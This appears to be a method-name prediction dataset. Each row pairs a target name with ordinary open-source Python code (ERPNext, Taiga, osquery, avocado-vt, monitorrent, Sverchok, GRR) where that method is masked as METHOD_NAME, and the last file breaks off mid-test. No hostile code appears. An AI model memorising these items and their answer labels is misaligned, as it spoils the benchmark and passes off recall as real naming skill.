super(SupplierQuotation, self).METHOD_NAME()
if not self.status:
self.status = "Draft"
from erpnext.controllers.status_updater import validate_status
validate_status(self.status, ["Draft", "Submitted", "Stopped", "Cancelled"])
validate_for_items(self)
self.validate_with_previous_doc()
self.validate_uom_is_integer("uom", "qty")
self.validate_valid_till()
def on_submit(self):
self.db_set("status", "Submitted")
self.update_rfq_supplier_status(1)
def on_cancel(self):
self.db_set("status", "Cancelled")
self.update_rfq_supplier_status(0)
def on_trash(self):
pass
def validate_with_previous_doc(self):
super(SupplierQuotation, self).validate_with_previous_doc(
{
"Material Request": {
"ref_dn_field": "prevdoc_docname",
"compare_fields": [["company", "="]],
},
"Material Request Item": {
"ref_dn_field": "prevdoc_detail_docname",
"compare_fields": [["item_code", "="], ["uom", "="]],
"is_child_table": True,
},
}
)
def validate_valid_till(self):
if self.valid_till and getdate(self.valid_till) < getdate(self.transaction_date):
frappe.throw(_("Valid till Date cannot be before Transaction Date"))
def update_rfq_supplier_status(self, include_me):
rfq_list = set([])
for item in self.items:
if item.request_for_quotation:
rfq_list.add(item.request_for_quotation)
for rfq in rfq_list:
doc = frappe.get_doc("Request for Quotation", rfq)
doc_sup = frappe.get_all(
"Request for Quotation Supplier",
filters={"parent": doc.name, "supplier": self.supplier},
fields=["name", "quote_status"],
)
doc_sup = doc_sup[0] if doc_sup else None
if not doc_sup:
frappe.throw(
_("Supplier {0} not found in {1}").format(
self.supplier,
"<a href='desk/app/Form/Request for Quotation/{0}'> Request for Quotation {0} </a>".format(
doc.name
),
)
)
quote_status = _("Received")
for item in doc.items:
sqi_count = frappe.db.sql(
"""
SELECT
COUNT(sqi.name) as count
FROM
`tabSupplier Quotation Item` as sqi,
`tabSupplier Quotation` as sq
WHERE sq.supplier = %(supplier)s
AND sqi.docstatus = 1
AND sq.name != %(me)s
AND sqi.request_for_quotation_item = %(rqi)s
AND sqi.parent = sq.name""",
{"supplier": self.supplier, "rqi": item.name, "me": self.name},
as_dict=1,
)[0]
self_count = (
sum(my_item.request_for_quotation_item == item.name for my_item in self.items)
if include_me
else 0
)
if (sqi_count.count + self_count) == 0:
quote_status = _("Pending")
frappe.db.set_value(
"Request for Quotation Supplier", doc_sup.name, "quote_status", quote_status
)
def get_list_context(context=None):
from erpnext.controllers.website_list_for_contact import get_list_context
list_context = get_list_context(context)
list_context.update(
{
"show_sidebar": True,
"show_search": True,
"no_breadcrumbs": True,
"title": _("Supplier Quotation"),
}
)
return list_context
@frappe.whitelist()
def make_purchase_order(source_name, target_doc=None):
def set_missing_values(source, target):
target.run_method("set_missing_values")
target.run_method("get_schedule_dates")
target.run_method("calculate_taxes_and_totals")
def update_item(obj, target, source_parent):
target.stock_qty = flt(obj.qty) * flt(obj.conversion_factor)
doclist = get_mapped_doc(
"Supplier Quotation",
source_name,
{
"Supplier Quotation": {
"doctype": "Purchase Order",
"validation": {
"docstatus": ["=", 1],
},
},
"Supplier Quotation Item": {
"doctype": "Purchase Order Item",
"field_map": [
["name", "supplier_quotation_item"],
["parent", "supplier_quotation"],
["material_request", "material_request"],
["material_request_item", "material_request_item"],
["sales_order", "sales_order"],
],
"postprocess": update_item,
},
"Purchase Taxes and Charges": {
"doctype": "Purchase Taxes and Charges",
},
},
target_doc,
set_missing_values,
)
doclist.set_onload("ignore_price_list", True)
return doclist
@frappe.whitelist()
def make_purchase_invoice(source_name, target_doc=None):
doc = get_mapped_doc(
"Supplier Quotation",
source_name,
{
"Supplier Quotation": {
"doctype": "Purchase Invoice",
"validation": {
"docstatus": ["=", 1],
},
},
"Supplier Quotation Item": {"doctype": "Purchase Invoice Item"},
"Purchase Taxes and Charges": {"doctype": "Purchase Taxes and Charges"},
},
target_doc,
)
return doc
@frappe.whitelist()
def make_quotation(source_name, target_doc=None):
doclist = get_mapped_doc(
"Supplier Quotation",
source_name,
{
"Supplier Quotation": {
"doctype": "Quotation",
"field_map": {
"name": "supplier_quotation",
},
},
"Supplier Quotation Item": {
"doctype": "Quotation Item",
"condition": lambda doc: frappe.db.get_value("Item", doc.item_code, "is_sales_item") == 1,
"add_if_empty": True,
},
},
target_doc,
)
return doclist
def set_expired_status():
frappe.db.sql(
"""
UPDATE
`tabSupplier Quotation` SET `status` = 'Expired'
WHERE
`status` not in ('Cancelled', 'Stopped') AND `valid_till` < %s
""",
(nowdate()),
) |
298,476 | test sitemap project kanbans | import pytest
from django.urls import reverse
from lxml import etree
from taiga.users.models import User
from tests import factories as f
from tests.utils import disconnect_signals, reconnect_signals
pytestmark = pytest.mark.django_db
NAMESPACES = {
"sitemapindex": "http://www.sitemaps.org/schemas/sitemap/0.9",
}
def setup_module(module):
disconnect_signals()
def teardown_module(module):
reconnect_signals()
@pytest.fixture
def data():
m = type("InitialData", (object,), {})()
m.project1 = f.ProjectFactory.create(is_private=False,
is_epics_activated=True,
is_backlog_activated=True,
is_kanban_activated=True,
is_issues_activated=True,
is_wiki_activated=True)
m.project2 = f.ProjectFactory.create(is_private=True,
is_epics_activated=True,
is_backlog_activated=True,
is_kanban_activated=True,
is_issues_activated=True,
is_wiki_activated=True)
m.epic11 = f.EpicFactory(project=m.project1)
m.epic21 = f.EpicFactory(project=m.project2)
m.milestone11 = f.MilestoneFactory(project=m.project1)
m.milestone21 = f.MilestoneFactory(project=m.project2)
m.us11 = f.UserStoryFactory(project=m.project1)
m.us21 = f.UserStoryFactory(project=m.project2)
m.task11 = f.TaskFactory(project=m.project1)
m.task21 = f.TaskFactory(project=m.project2)
m.issue11 = f.IssueFactory(project=m.project1)
m.issue21 = f.IssueFactory(project=m.project2)
m.wikipage11 = f.WikiPageFactory(project=m.project1)
m.wikipage21 = f.WikiPageFactory(project=m.project2)
return m
def test_sitemaps_index(client):
url = reverse('front-sitemap-index')
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 11 # ["/generics", "/projects", "/project_backlogs", "/project_kanbans", "/epics",
# "/milestones", "/userstories", "/tasks", "/issues", "/wikipages", "/users"]
def test_sitemap_generics(client, data):
url = reverse('front-sitemap', kwargs={"section": "generics"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 5 # ["/", "/discover", "/login", "/register", "/forgot-password"]
def test_sitemap_projects(client, data):
url = reverse('front-sitemap', kwargs={"section": "projects"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_project_backlogs(client, data):
url = reverse('front-sitemap', kwargs={"section": "project-backlogs"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def METHOD_NAME(client, data):
url = reverse('front-sitemap', kwargs={"section": "project-kanbans"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_epics(client, data):
url = reverse('front-sitemap', kwargs={"section": "epics"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_milestones(client, data):
url = reverse('front-sitemap', kwargs={"section": "milestones"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_userstories(client, data):
url = reverse('front-sitemap', kwargs={"section": "userstories"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_tasks(client, data):
url = reverse('front-sitemap', kwargs={"section": "tasks"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_issues(client, data):
url = reverse('front-sitemap', kwargs={"section": "issues"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_wikipages(client, data):
url = reverse('front-sitemap', kwargs={"section": "wikipages"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == 1
def test_sitemap_users(client, data):
url = reverse('front-sitemap', kwargs={"section": "users"})
response = client.get(url)
assert response.status_code == 200, response.data
tree = etree.fromstring(response.content)
urls = tree.xpath("//sitemapindex:loc/text()", namespaces=NAMESPACES)
assert len(urls) == User.objects.filter(is_active=True, is_system=False).count() |
298,477 | url for spec | #!/usr/bin/env python3
# Copyright (c) 2014-present, The osquery authors
#
# This source code is licensed as defined by the LICENSE file found in the
# root directory of this source tree.
#
# SPDX-License-Identifier: (Apache-2.0 OR GPL-2.0-only)
"""
Generate a complete table specification for the website
This script will generate JSON output as expected by the osquery website given
a directory of osquery schema specifications. Results will be printer to stdout.
Usage:
python tools/codegen/genwebsitejson.py --specs=./specs
"""
# Copyright (c) 2014-present, The osquery authors
#
# This source code is licensed as defined by the LICENSE file found in the
# root directory of this source tree.
#
# SPDX-License-Identifier: (Apache-2.0 OR GPL-2.0-only)
import json
import os
import re
import sys
from gentable import *
# In the specs/ directory of the osquery repository, specification files are put
# in certain directories based on what platforms they are meant to be built on.
# This data structure represents the directories in specs/ and how they map to
# the operating systems which support tables found in those directories
PLATFORM_DIRS = {
"specs": ["darwin", "linux", "windows"],
"utility": ["darwin", "linux", "windows"],
"yara": ["darwin", "linux", "windows"],
"smart": ["darwin", "linux"],
"darwin": ["darwin"],
"kernel": ["darwin"],
"linwin": ["linux", "windows"],
"linux": ["linux"],
"macwin": ["darwin", "windows"],
"posix": ["darwin", "linux"],
"sleuthkit": ["darwin", "linux"],
"windows": ["windows"],
}
BASE_SOURCE_URL = "https://github.com/osquery/osquery/blob/master"
def platform_for_spec(path):
"""Given a path to a table specification, return a list of what osquery
platforms that table will work on. In the event that no match is found, it
will be assumed that the table is found on all platforms.
"""
full_path = os.path.abspath(path)
directory_list = os.path.dirname(full_path).split("/")
directory = directory_list[len(directory_list)-1]
return PLATFORM_DIRS[directory]
def remove_prefix(text, prefix):
# python 3.9 has `removeprefix`, but I don't want to add that requirement.
if text.startswith(prefix):
return text[len(prefix):]
return text
def METHOD_NAME(specs_dir, path):
"""Given a path to a table specification, return the URL that would take you
to the specification on GitHub.
"""
path_fragment = remove_prefix(path, specs_dir).lstrip("/ ")
url = os.path.join(BASE_SOURCE_URL, "specs", path_fragment)
return url
def generate_table_metadata(specs_dir, full_path):
"""This function generates a dictionary of table metadata for a spec file
found at a given path."""
with open(full_path, "r") as file_handle:
# Each osquery table specification is a syntactically correct python file
# because we imported `from gentable import *`, we imported all of the
# functions that you use in an osquery specification. a global "table"
# is then modified based on the python that has just executed.
tree = ast.parse(file_handle.read())
exec(compile(tree, "<string>", "exec"))
# Now that the `table` variable is accessible, we can access attributes
# of the table
t = {}
t["name"] = table.table_name
t["description"] = table.description
t["url"] = METHOD_NAME(specs_dir, full_path)
t["platforms"] = platform_for_spec(full_path)
t["evented"] = "event_subscriber" in table.attributes
t["cacheable"] = "cacheable" in table.attributes
t["notes"] = table.notes
t["examples"] = table.examples
# Now we must iterate through `table.columns` to collect information
# about each column
t["columns"] = []
for col in table.columns():
c = {}
c["name"] = col.name
c["description"] = col.description
c["type"] = col.type.affinity.replace("_TYPE", "").lower()
c["notes"] = col.notes
c["hidden"] = col.options.get("hidden", False)
c["required"] = col.options.get("required", False)
c["index"] = col.options.get("index", False)
if col.platforms != []:
c["platforms"] = col.platforms
t["columns"].append(c)
return t
def main(argc, argv):
parser = argparse.ArgumentParser(
"Generate minmal JSON from a table spec")
parser.add_argument("--specs", help="Path to spec directory", required=True)
args = parser.parse_args()
specs_dir = os.path.abspath(args.specs)
tables = {}
for subdir, dirs, files in os.walk(specs_dir):
for filename in files:
# Skip the example spec in the spec/ dir.
# There is no actual example table in osquery so it should not be generated into the docs.
if filename == "example.table":
continue
if filename.endswith(".table"):
full_path = os.path.join(subdir, filename)
metadata = generate_table_metadata(specs_dir, full_path)
tables[metadata["name"]] = metadata
# Print the JSON output to stdout
print(json.dumps([value for key, value in sorted(tables.items())], indent=2, separators=(',', ':')))
if __name__ == "__main__":
main(len(sys.argv), sys.argv) |
298,478 | get vcpu used node | import resource
from avocado.utils import process
from virttest import cpu
from virttest import env_process
from virttest import error_context
from virttest import utils_misc
from virttest import utils_test
from virttest import arch
from virttest.staging import utils_memory
@error_context.context_aware
def run(test, params, env):
"""
Qemu numa consistency test:
1) Get host numa topological structure
2) Start a guest with the same node as the host, each node has one cpu
3) Get the vcpu thread used cpu id in host and the cpu belongs which node
4) Allocate memory inside guest and bind the allocate process to one of
its vcpu.
5) The memory used in host should increase in the same node if the vcpu
thread is not switch to other node.
6) Repeat step 3~5 for each vcpu thread of the guest.
:param test: QEMU test object
:param params: Dictionary with the test parameters
:param env: Dictionary with test environment.
"""
def METHOD_NAME(numa_node_info, vcpu_thread):
cpu_used_host = cpu.get_thread_cpu(vcpu_thread)[0]
node_used_host = ([_ for _ in node_list if cpu_used_host
in numa_node_info.nodes[_].cpus][0])
return node_used_host
error_context.context("Get host numa topological structure", test.log.info)
timeout = float(params.get("login_timeout", 240))
host_numa_node = utils_misc.NumaInfo()
node_list = host_numa_node.online_nodes_withcpumem
if len(node_list) < 2:
test.cancel("This host only has one NUMA node, skipping test...")
node_list.sort()
params['smp'] = len(node_list)
params['vcpu_cores'] = 1
params['vcpu_threads'] = 1
params['vcpu_sockets'] = params['smp']
params['vcpu_maxcpus'] = params['smp']
params['guest_numa_nodes'] = ""
params['mem_devs'] = ""
params['backend_mem'] = "memory-backend-ram"
params['use_mem'] = "no"
params['size_mem'] = "1024M"
if arch.ARCH in ('ppc64', 'ppc64le'):
params['size_mem'] = "4096M"
params['mem'] = int(params['size_mem'].strip('M')) * len(node_list)
for node_id in range(len(node_list)):
params['guest_numa_nodes'] += " node%d" % node_id
params['mem_devs'] += "mem%d " % node_id
params['numa_memdev_node%d' % node_id] = "mem-mem%d" % node_id
params['start_vm'] = 'yes'
utils_memory.drop_caches()
vm = params['main_vm']
env_process.preprocess_vm(test, params, env, vm)
vm = env.get_vm(vm)
vm.verify_alive()
vcpu_threads = vm.vcpu_threads
session = vm.wait_for_login(timeout=timeout)
threshold = params.get_numeric("threshold", target_type=float)
dd_size = 256
if dd_size * len(vcpu_threads) > int(params['mem']):
dd_size = int(int(params['mem']) / 2 / len(vcpu_threads))
mount_size = dd_size * len(vcpu_threads)
mount_cmd = "mount -o size=%dM -t tmpfs none /tmp" % mount_size
qemu_pid = vm.get_pid()
drop = 0
for cpuid in range(len(vcpu_threads)):
error_context.context("Get vcpu %s used numa node." % cpuid,
test.log.info)
memory_status, _ = utils_test.qemu.get_numa_status(host_numa_node,
qemu_pid)
node_used_host = METHOD_NAME(host_numa_node,
vcpu_threads[cpuid])
node_used_host_index = node_list.index(node_used_host)
memory_used_before = memory_status[node_used_host_index]
error_context.context("Allocate memory in guest", test.log.info)
session.cmd(mount_cmd)
binded_dd_cmd = "taskset %s" % str(2 ** int(cpuid))
binded_dd_cmd += " dd if=/dev/urandom of=/tmp/%s" % cpuid
binded_dd_cmd += " bs=1M count=%s" % dd_size
session.cmd(binded_dd_cmd)
error_context.context("Check qemu process memory use status",
test.log.info)
node_after = METHOD_NAME(host_numa_node, vcpu_threads[cpuid])
if node_after != node_used_host:
test.log.warn("Node used by vcpu thread changed. So drop the"
" results in this round.")
drop += 1
continue
memory_status, _ = utils_test.qemu.get_numa_status(host_numa_node,
qemu_pid)
memory_used_after = memory_status[node_used_host_index]
page_size = resource.getpagesize() / 1024
memory_allocated = (memory_used_after -
memory_used_before) * page_size / 1024
if 1 - float(memory_allocated) / float(dd_size) > threshold:
numa_hardware_cmd = params.get("numa_hardware_cmd")
if numa_hardware_cmd:
numa_info = process.system_output(numa_hardware_cmd,
ignore_status=True,
shell=True)
msg = "Expect malloc %sM memory in node %s," % (dd_size,
node_used_host)
msg += "but only malloc %sM \n" % memory_allocated
msg += "Please check more details of the numa node: %s" % numa_info
test.fail(msg)
session.close()
if drop == len(vcpu_threads):
test.error("All test rounds are dropped. Please test it again.") |
298,479 | get log entries | from builtins import range
import json
import falcon
from mock import MagicMock
from ddt import ddt, data
from tests import RestTestBase
from monitorrent.rest.execute_logs import ExecuteLogs
class ExecuteLogsTest(RestTestBase):
def test_get_all(self):
entries = [{}, {}, {}]
count = 3
log_manager = MagicMock()
log_manager.METHOD_NAME = MagicMock(return_value=(entries, count))
# noinspection PyTypeChecker
execute_logs = ExecuteLogs(log_manager)
self.api.add_route('/api/execute/logs', execute_logs)
body = self.simulate_request('/api/execute/logs', query_string='take=10', decode='utf-8')
self.assertEqual(self.srmock.status, falcon.HTTP_OK)
self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
result = json.loads(body)
self.assertEqual(entries, result['data'])
self.assertEqual(count, result['count'])
def test_get_paged(self):
# count should be less than 30
count = 23
entries = [{'i': i} for i in range(count)]
def METHOD_NAME(skip, take):
return entries[skip:skip + take], count
log_manager = MagicMock()
log_manager.METHOD_NAME = MagicMock(side_effect=METHOD_NAME)
# noinspection PyTypeChecker
execute_logs = ExecuteLogs(log_manager)
self.api.add_route('/api/execute/logs', execute_logs)
body = self.simulate_request('/api/execute/logs', query_string='take=10', decode='utf-8')
self.assertEqual(self.srmock.status, falcon.HTTP_OK)
self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
result = json.loads(body)
self.assertEqual(entries[0:10], result['data'])
self.assertEqual(count, result['count'])
body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=0', decode='utf-8')
self.assertEqual(self.srmock.status, falcon.HTTP_OK)
self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
result = json.loads(body)
self.assertEqual(entries[0:10], result['data'])
self.assertEqual(count, result['count'])
body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=10', decode='utf-8')
self.assertEqual(self.srmock.status, falcon.HTTP_OK)
self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
result = json.loads(body)
self.assertEqual(entries[10:20], result['data'])
self.assertEqual(count, result['count'])
body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=20', decode='utf-8')
self.assertEqual(self.srmock.status, falcon.HTTP_OK)
self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
result = json.loads(body)
# assume that count is less then 30
self.assertEqual(entries[20:count], result['data'])
self.assertEqual(count, result['count'])
def test_bad_requests(self):
entries = [{}, {}, {}]
count = 3
log_manager = MagicMock()
log_manager.METHOD_NAME = MagicMock(return_value=(entries, count))
# noinspection PyTypeChecker
execute_logs = ExecuteLogs(log_manager)
self.api.add_route('/api/execute/logs', execute_logs)
self.simulate_request('/api/execute/logs')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take is required')
self.simulate_request('/api/execute/logs', query_string='take=abcd')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be int')
self.simulate_request('/api/execute/logs', query_string='take=10&skip=abcd')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'skip should be int')
self.simulate_request('/api/execute/logs', query_string='take=101')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be less or equal to 100')
self.simulate_request('/api/execute/logs', query_string='take=-10')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be greater than 0')
self.simulate_request('/api/execute/logs', query_string='take=0')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be greater than 0')
self.simulate_request('/api/execute/logs', query_string='take=10&skip=-1')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'skip should be greater or equal to 0') |
298,480 | invoke | import bpy
from bpy.props import StringProperty, BoolProperty, EnumProperty
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_logging import sv_logger
from sverchok.dependencies import FreeCAD
from sverchok.utils.sv_operator_mixins import SvGenericNodeLocator
if FreeCAD is not None:
F = FreeCAD
class SvReadFCStdOperator(bpy.types.Operator, SvGenericNodeLocator):
bl_idname = "node.sv_read_fcstd_operator"
bl_label = "read freecad file"
bl_options = {'INTERNAL', 'REGISTER'}
def execute(self, context):
node = self.get_node(context)
if not node: return {'CANCELLED'}
if not any(socket.is_linked for socket in node.outputs):
return {'CANCELLED'}
if not node.inputs['File Path'].is_linked:
return {'CANCELLED'}
node.read_FCStd(node)
updateNode(node,context)
return {'FINISHED'}
class SvReadFCStdNode(SverchCustomTreeNode, bpy.types.Node):
"""
Triggers: Read FreeCAD file
Tooltip: import parts from a .FCStd file
"""
bl_idname = 'SvReadFCStdNode'
bl_label = 'Read FCStd'
bl_icon = 'IMPORT'
sv_category = "Solid Outputs"
sv_dependencies = {'FreeCAD'}
read_update : BoolProperty(name="read_update", default=True)
read_body : BoolProperty(name="read_body", default=True, update = updateNode)
read_part : BoolProperty(name="read_part", default=True, update = updateNode)
tool_parts : BoolProperty(name="tool_parts", default=False, update = updateNode)
read_features : BoolProperty(name="read_features", default=False, update = updateNode)
inv_filter : BoolProperty(name="inv_filter", default=False, update = updateNode)
selected_label : StringProperty( default= 'Select FC Part')
selected_part : StringProperty( default='', update = updateNode)
def draw_buttons(self, context, layout):
col = layout.column(align=True)
if self.inputs['File Path'].is_linked:
self.wrapper_tracked_ui_draw_op(
col, SvShowFcstdNamesOp.bl_idname,
icon= 'TRIA_DOWN',
text= self.selected_label )
col.prop(self, 'read_update', text = 'global update')
col.prop(self, 'read_body')
col.prop(self, 'read_part')
col.prop(self, 'tool_parts')
if self.tool_parts:
col.prop(self, 'read_features')
col.prop(self, 'inv_filter')
self.wrapper_tracked_ui_draw_op(layout, SvReadFCStdOperator.bl_idname, icon='FILE_REFRESH', text="UPDATE")
def sv_init(self, context):
self.inputs.new('SvFilePathSocket', "File Path")
self.inputs.new('SvStringsSocket', "Part Filter")
self.outputs.new('SvSolidSocket', "Solid")
self.outputs.new('SvTextSocket', "Names")
def ensure_name_socket_exists(self):
if not "Names" in self.outputs:
self.outputs.new('SvTextSocket', "Names")
def read_FCStd(self, node):
files = node.inputs['File Path'].sv_get()[0]
part_filter = []
if node.inputs['Part Filter'].is_linked:
part_filter = node.inputs['Part Filter'].sv_get()[0]
if node.selected_part != '' and not node.selected_part in part_filter:
part_filter.append(node.selected_part)
solids = []
obj_mask = []
names = []
if node.read_features:
obj_mask.append('PartDesign')
if node.read_part:
obj_mask.append('Part')
if node.read_body:
obj_mask.append('PartDesign::Body')
for f in files:
S = LoadSolid(f, part_filter, obj_mask, node.tool_parts, node.inv_filter)
for s, n in S:
solids.append(s)
names.append(list(n))
node.outputs['Solid'].sv_set(solids)
self.ensure_name_socket_exists()
node.outputs['Names'].sv_set(names)
def process(self):
if not any(socket.is_linked for socket in self.outputs):
return
if not self.inputs['File Path'].is_linked:
return
if self.read_update:
self.read_FCStd(self)
else:
return
class SvShowFcstdNamesOp(bpy.types.Operator, SvGenericNodeLocator):
bl_idname = "node.sv_show_fcstd_names"
bl_label = "Show parts list"
bl_options = {'INTERNAL', 'REGISTER'}
bl_property = "option"
def LabelReader(self,context):
labels=[('','','')]
tree = bpy.data.node_groups[self.tree_name]
node = tree.nodes[self.node_name]
fc_file_list = node.inputs['File Path'].sv_get()[0]
obj_mask = []
if node.read_features:
obj_mask.append('PartDesign')
if node.read_part:
obj_mask.append('Part')
if node.read_body:
obj_mask.append('PartDesign::Body')
for f in fc_file_list:
try:
doc = F.open(f)
Fname = doc.Name or bpy.path.display_name_from_filepath(f)
for obj in doc.Objects:
if obj.Module in obj_mask or obj.TypeId in obj_mask:
labels.append( (obj.Label, obj.Label, obj.Label) )
except Exception as err:
sv_logger.info(f'FCStd label read error: {Fname=}')
sv_logger.info(err)
finally:
# del doc
F.closeDocument(doc.Name)
return labels
option : EnumProperty(items=LabelReader)
tree_name : StringProperty()
node_name : StringProperty()
def execute(self, context):
tree = bpy.data.node_groups[self.tree_name]
node = tree.nodes[self.node_name]
node.name_filter = self.option
node.selected_label = self.option
node.selected_part = self.option
bpy.context.area.tag_redraw()
return {'FINISHED'}
def METHOD_NAME(self, context, event):
context.space_data.cursor_location_from_region(event.mouse_region_x, event.mouse_region_y)
wm = context.window_manager
wm.invoke_search_popup(self)
return {'FINISHED'}
def LoadSolid(fc_file, part_filter, obj_mask, tool_parts, inv_filter):
objs= set()
outList = set()
solids = set()
try:
doc = F.open(fc_file)
Fname = doc.Name or bpy.path.display_name_from_filepath(fc_file)
for obj in doc.Objects:
if obj.Module in obj_mask or obj.TypeId in obj_mask:
objs.add (obj)
if not tool_parts and obj.TypeId in ( 'Part::Cut','Part::Fuse','Part::MultiCommon','Part::Section','Part::FeaturePython' ):
if len(obj.OutList) > 0:
for out_obj in obj.OutList:
outList.add (out_obj)
objs = objs - outList
for obj in objs:
if not inv_filter:
if obj.Label in part_filter or len(part_filter)==0:
solids.add((obj.Shape, (obj.FullName, obj.Name, obj.Label)))
else:
if not obj.Label in part_filter:
solids.add((obj.Shape, (obj.FullName, obj.Name, obj.Label)))
except:
sv_logger.info('FCStd read error')
finally:
# del doc
F.closeDocument(doc.Name)
return solids
def register():
bpy.utils.register_class(SvReadFCStdNode)
bpy.utils.register_class(SvShowFcstdNamesOp)
bpy.utils.register_class(SvReadFCStdOperator)
def unregister():
bpy.utils.unregister_class(SvReadFCStdNode)
bpy.utils.unregister_class(SvShowFcstdNamesOp)
bpy.utils.unregister_class(SvReadFCStdOperator) |
298,481 | test pagination navigation | #!/usr/bin/env python
from absl import app
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_server.flows.general import network
from grr_response_server.gui import gui_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class NetstatTest(gui_test_lib.GRRSeleniumTest):
"""Tests the Netstat Flow."""
def setUp(self):
super().setUp()
self.client_id = self.SetupClient(0)
self.RequestAndGrantClientApproval(self.client_id)
def testFiltering(self):
flow_id = flow_test_lib.StartFlow(
network.Netstat, creator=self.test_username, client_id=self.client_id)
self.Open(f"/v2/clients/{self.client_id}")
self.WaitUntil(self.IsElementPresent,
"css=result-accordion .title:contains('All connections')")
flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
rdf_client_network.NetworkConnection(process_name=f"process{i}")
for i in range(10)
])
self.Click("css=result-accordion .title:contains('All connections')")
for i in range(10):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.Type("css=.filter-input input", "process0")
self.WaitUntil(self.IsElementPresent, "css=td:contains('process0')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 1)
def testSorting(self):
flow_args = network.NetstatArgs(listening_only=True)
flow_id = flow_test_lib.StartFlow(
network.Netstat,
creator=self.test_username,
client_id=self.client_id,
flow_args=flow_args)
self.Open(f"/v2/clients/{self.client_id}")
self.WaitUntil(self.IsElementPresent,
"css=result-accordion .title:contains('Listening only')")
flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
rdf_client_network.NetworkConnection(process_name=f"process{i}")
for i in range(3)
])
self.Click("css=result-accordion .title:contains('Listening only')")
for i in range(3):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.Click("css=.mat-sort-header:contains('Process Name')")
for i in [0, 1, 2]: # reordered results asc
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.Click("css=.mat-sort-header:contains('Process Name')")
for i in [2, 1, 0]: # reordered results desc
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
def METHOD_NAME(self):
flow_args = network.NetstatArgs(listening_only=True)
flow_id = flow_test_lib.StartFlow(
network.Netstat,
creator=self.test_username,
client_id=self.client_id,
flow_args=flow_args)
self.Open(f"/v2/clients/{self.client_id}")
self.WaitUntil(self.IsElementPresent,
"css=result-accordion .title:contains('Listening only')")
flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
rdf_client_network.NetworkConnection(process_name=f"process{i}")
for i in range(15)
])
self.Click("css=result-accordion .title:contains('Listening only')")
for i in range(10):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
# Navigation works in both top and bottom paginators.
self.Click("css=.top-paginator .mat-mdc-paginator-navigation-last")
for i in range(10, 15):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 5)
self.ScrollToBottom()
self.Click("css=.bottom-paginator .mat-mdc-paginator-navigation-previous")
for i in range(10):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
def testPaginationSize(self):
flow_args = network.NetstatArgs(listening_only=False)
flow_id = flow_test_lib.StartFlow(
network.Netstat,
creator=self.test_username,
client_id=self.client_id,
flow_args=flow_args)
self.Open(f"/v2/clients/{self.client_id}")
self.WaitUntil(self.IsElementPresent,
"css=result-accordion .title:contains('All connections')")
flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
